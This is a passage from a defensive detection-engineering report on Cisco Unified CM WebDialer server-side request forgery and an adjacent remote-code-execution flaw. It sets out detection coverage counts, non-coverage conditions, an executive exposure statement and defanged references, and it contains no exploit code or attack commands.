Public exploit activity, proof-of-concept code, scanner behavior, commodity probing, or unnamed exploitation infrastructure may overlap this report where observable behavior aligns with suspicious WebDialer access, SSRF-shaped request behavior, rare egress, file activity, service manipulation, administrative change, route-plan change, call-routing change, or voice-service instability. Those items should remain activity context unless a named tool, exploit kit, malware family, webshell, script, payload, or operational framework is source-validated and behaviorally mapped to the S21 through S25 detection model.

Named APT / Actor / Campaign Activity Coverage

No named APT, actor, intrusion set, or campaign is directly counted in this version.

Public exploitation of Cisco Unified CM / Unified CM SME WebDialer SSRF may indicate active threat interest in the affected behavior class, but actor names, campaign names, infrastructure labels, victimology, exploit-source labels, and reporting names should remain enrichment only unless the activity produces observable behavior aligned with this report’s detection model. Detection coverage should remain based on WebDialer activity, SSRF-shaped request behavior, voice-control-plane follow-on signals, rare egress, administrative change, service activity, file activity, route-plan change, call-routing change, and voice-service instability.

Detection Engineering Coverage Interpretation

The S25 detection content provides direct behavioral coverage for Cisco Unified CM / Unified CM SME WebDialer SSRF and voice-control-plane compromise behavior where observable activity falls directly inside the report’s detection model: suspicious WebDialer access, abnormal source or workflow context, WebDialer enablement, SSRF-shaped request indicators, backend-fetch behavior, response anomalies, rare Unified CM egress, suspicious administrative activity, service-state change, file activity, route-plan change, call-routing change, abnormal management login, unusual cluster communication, and voice-service instability.

The S25 detection content provides coverage with adaptation for adjacent Cisco Unified Communications compromise paths when the downstream behavior aligns with the report’s voice-control-plane compromise model but the upstream trigger differs from WebDialer SSRF. Adaptation may require changing the initial trigger from WebDialer-specific request behavior to another affected web-management, appliance, API, or HTTP request path while preserving follow-on correlation to rare egress, command execution, file activity, service manipulation, administrator change, route-plan change, call-routing change, or voice-service instability.

The S25 detection content provides actor, campaign, tooling, and exploit-activity coverage only as behavior-led coverage. Actor names, reporting names, proof-of-concept names, infrastructure names, exploit-kit names, and public activity labels should not be used as detection inputs unless they are locally approved enrichment fields supporting triage. Detection coverage remains based on observable Cisco Unified CM / Unified CM SME and voice-control-plane behavior.

Direct Coverage

Direct behavioral coverage applies to Cisco Unified CM / Unified CM SME WebDialer SSRF and voice-control-plane compromise behavior that can be detected by the report’s S21 through S25 logic without requiring a separate detection model.

CVE-2026-20230

Directly covered.

Cisco Unified CM / Unified CM SME WebDialer suspicious activity followed by rare egress or voice-control-plane change

Directly covered.

Cisco Unified CM / Unified CM SME WebDialer SSRF-shaped request behavior

Directly covered.

Cisco Unified CM / Unified CM SME rare egress after suspicious WebDialer activity

Directly covered.

Cisco Unified CM / Unified CM SME administrative, service-state, route-plan, call-routing, file, or voice-service instability behavior after suspicious WebDialer activity

Directly covered.

Coverage With Adaptation

Coverage with adaptation applies to related Cisco Unified Communications, voice-platform, web-management, appliance-control-plane, or HTTP request-handling vulnerabilities that may share parts of the report’s voice-control-plane compromise model but require local tuning for affected component, initial exploit path, telemetry source, affected product, request path, privilege requirement, endpoint visibility, administrative context, file or service behavior, route-plan behavior, call-routing behavior, or egress model.

CVE-2026-20045

Covered with adaptation.

Adjacent Cisco Unified Communications product compromise paths involving Unified CM, Unified CM SME, Unified CM IM & Presence Service, Unity Connection, or Webex Calling Dedicated Instance where observable behavior includes command execution, file activity, service manipulation, administrative change, rare egress, route-plan change, call-routing impact, or voice-service instability

Covered with adaptation after source validation and behavior-to-telemetry alignment.

Future Cisco Unified CM / Unified CM SME WebDialer, web-management, API, voice-management, or appliance-control-plane CVEs where observable behavior aligns to the report’s WebDialer-to-control-plane or voice-platform compromise model

Covered with adaptation after source validation and behavior-to-telemetry alignment.

Future exploit activity, proof-of-concept activity, malware, webshell, tooling, or actor campaigns targeting Cisco Unified Communications infrastructure where observable behavior aligns to suspicious voice-management web access, rare egress, command execution, file activity, administrative change, service manipulation, route-plan change, call-routing change, or voice-service instability

Covered with adaptation after source validation and behavior-to-telemetry alignment.

Non-Coverage Conditions

Non-coverage applies where related activity does not produce observable suspicious WebDialer activity, voice-management web activity, SSRF-shaped request behavior, backend-fetch behavior, rare Unified CM egress, command execution, administrative change, service-state change, file activity, route-plan change, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, or appliance-side compromise evidence.

Activity limited to unrelated Cisco products, unrelated network appliances, generic internet scanning, unrelated web exploitation, endpoint-only malware, unrelated SaaS platforms, cloud-only anomalies, identity-only anomalies without voice-platform follow-on behavior, network-only anomalies without Cisco Unified CM scope, isolated public reporting, actor attribution, infrastructure indicators, static IOCs, or unrelated CVE exploitation should not be represented as covered by this report.

A CVE should not be counted when it depends on an unrelated exploitation mechanism, lacks sufficient technical detail, affects an unrelated component, produces no aligned Cisco Unified CM / Unified CM SME or voice-control-plane telemetry, cannot be correlated through the report’s WebDialer-to-control-plane or voice-platform compromise model, or would require detection logic outside the S21 through S25 strategy.

A malware, tooling, PhaaS, actor, or campaign name should not be counted when coverage depends only on branding, infrastructure indicators, static IOCs, exploit naming, actor attribution, public reporting labels, or vendor naming rather than observable behavior aligned with the report’s detection model.

Current Coverage Count

Directly covered CVEs

1

CVEs covered with adaptation

1

Known Exploited Vulnerabilities represented in this coverage set

1

Known Exploited Vulnerability represented with adaptation

CVE-2026-20045

Directly covered malware / tooling / PhaaS / tradecraft names or named tooling patterns

0

Malware / tooling / PhaaS / tradecraft names covered with adaptation

0 currently counted in this version. Future named exploit tooling, webshells, scripts, malware, proof-of-concept frameworks, scanning infrastructure, or appliance-compromise tooling may be added only after source validation and behavior-to-telemetry alignment.

Directly covered APT / actor / campaign activity names or named activity patterns

0

APT / actor / campaign activity names covered with adaptation

0 currently counted in this version. Future actor or campaign activity may be added only when the observable behavior aligns with the report’s Cisco Unified CM / Unified CM SME WebDialer, voice-control-plane, rare-egress, administrative-change, service-manipulation, route-plan, call-routing, or voice-service instability model.

Directly covered behavioral tradecraft classes

1 core behavior class, Cisco Unified CM / Unified CM SME WebDialer SSRF and voice-control-plane appliance compromise behavior.

Behavioral tradecraft classes covered with adaptation

1 adjacent behavior class, Cisco Unified Communications appliance compromise involving unauthenticated remote command execution or adjacent voice-platform exploitation with overlapping post-exploitation telemetry.

Total explicitly counted coverage items

3

Count Composition

1 directly covered CVE.

1 CVE covered with adaptation.

1 directly covered behavioral tradecraft class.

Coverage Qualification

This count is a living analytical note, not a universal Cisco Unified Communications, Cisco Unified CM, Cisco Unified CM SME, Cisco voice-platform, Cisco appliance, VoIP infrastructure, command-execution, SSRF, web-management, appliance-compromise, malware, tooling, actor, or campaign coverage claim. A related CVE, malware family, exploit kit, webshell, proof-of-concept, actor cluster, campaign report, advisory, or public exploitation report should only be added when it shares enough observable behavior with the report’s detection model to support credible detection or detection-readiness coverage.

Direct coverage should remain limited to the report’s core Cisco Unified CM / Unified CM SME WebDialer-to-control-plane behavior, including suspicious WebDialer access, WebDialer enablement, SSRF-shaped request behavior, backend-fetch behavior, abnormal response behavior, rare egress, suspicious administrative activity, service-state change, file activity, route-plan change, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, and suspected appliance-side compromise.

Covered-with-adaptation items should remain counted only when the activity can be correlated through WAF logs, reverse-proxy logs, load-balancer logs, Cisco Unified CM access logs, administrative audit logs, service-state telemetry, route-plan telemetry, call-routing telemetry, file-integrity telemetry, firewall logs, proxy logs, DNS logs, NDR telemetry, endpoint-adjacent telemetry, provider-support records, change-control evidence, approved workflow context, and stable Cisco Unified CM scope enrichment.

KEV status should be treated as an urgency and remediation-prioritization signal, not as the basis for coverage by itself. Malware, tooling, proof-of-concept, actor, and campaign names should be treated as coverage context only when their behavior aligns to the report’s S21 through S25 detection strategy.

A related CVE, proof-of-concept, malware family, webshell, exploit kit, actor cluster, or campaign report should not be counted when it depends on unrelated exploitation mechanics, lacks aligned telemetry, affects unrelated products or components, produces no Cisco Unified CM / Unified CM SME, WebDialer, rare-egress, administrative-change, service-state, route-plan, call-routing, file-activity, command-execution, or voice-service instability behavior, or requires a separate detection model.

Executive Exposure Statement

The organization’s economic exposure is highest when Cisco Unified CM / Unified CM SME compromise creates uncertainty around whether enterprise voice routing, WebDialer workflows, administrative control, route-plan integrity, call-routing behavior, service state, provider-managed access, and communications continuity remain trustworthy. The strategic risk is not only one WebDialer request, one CVE, one exploit string, one proof-of-concept, one source IP, one scanner, one advisory, or one public exploitation report; it is the possibility that attackers can convert trusted voice-management infrastructure into a control-plane compromise path that disrupts communications, undermines call-routing integrity, increases legal and regulatory uncertainty, and forces executive-level validation of communications-infrastructure trust.

S40 — References

Vendor / Platform Documentation

Cisco Feature Configuration Guide for Cisco Unified Communications Manager - WebDialer - hxxps://www[.]cisco[.]com/c/en/us/td/docs/voice_ip_comm/cucm/admin/cucm_b_feature-configuration-guide-for-15/cucm_mp_w3db9717_00_webdialer-12-0[.]html

Cisco DevNet - WebDialer - hxxps://developer[.]cisco[.]com/site/webdialer/webdialer/

Cisco Security Advisory - Cisco Unified Communications Manager Server-Side Request Forgery Vulnerability - hxxps://sec[.]cloudapps[.]cisco[.]com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-ssrf-cXPnHcW

Cisco Security Advisory - Cisco Unified Communications Products Remote Code Execution Vulnerability - hxxps://sec[.]cloudapps[.]cisco[.]com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voice-rce-mORhqY4b

CVE / KEV and Vulnerability Reference

CISA Known Exploited Vulnerabilities Catalog - hxxps://www[.]cisa[.]gov/known-exploited-vulnerabilities-catalog

National Vulnerability Database - CVE-2026-20045 - hxxps://nvd[.]nist[.]gov/vuln/detail/CVE-2026-20045

Threat Technique Framework

MITRE ATT&CK Enterprise Matrix / Techniques Catalog - hxxps://attack[.]mitre[.]org/

Public Exploitation Reporting

BleepingComputer - Cisco Unified CM flaw CVE-2026-20230 now exploited in attacks - hxxps://www[.]bleepingcomputer[.]com/news/security/cisco-unified-cm-sme-flaw-cve-2026-20230-now-exploited-in-attacks/

The Hacker News - Cisco Unified CM Flaw Exploited After PoC Reveals File-Write Path to Root - hxxps://thehackernews[.]com/2026/06/cisco-unified-cm-flaw-exploited-after[.]html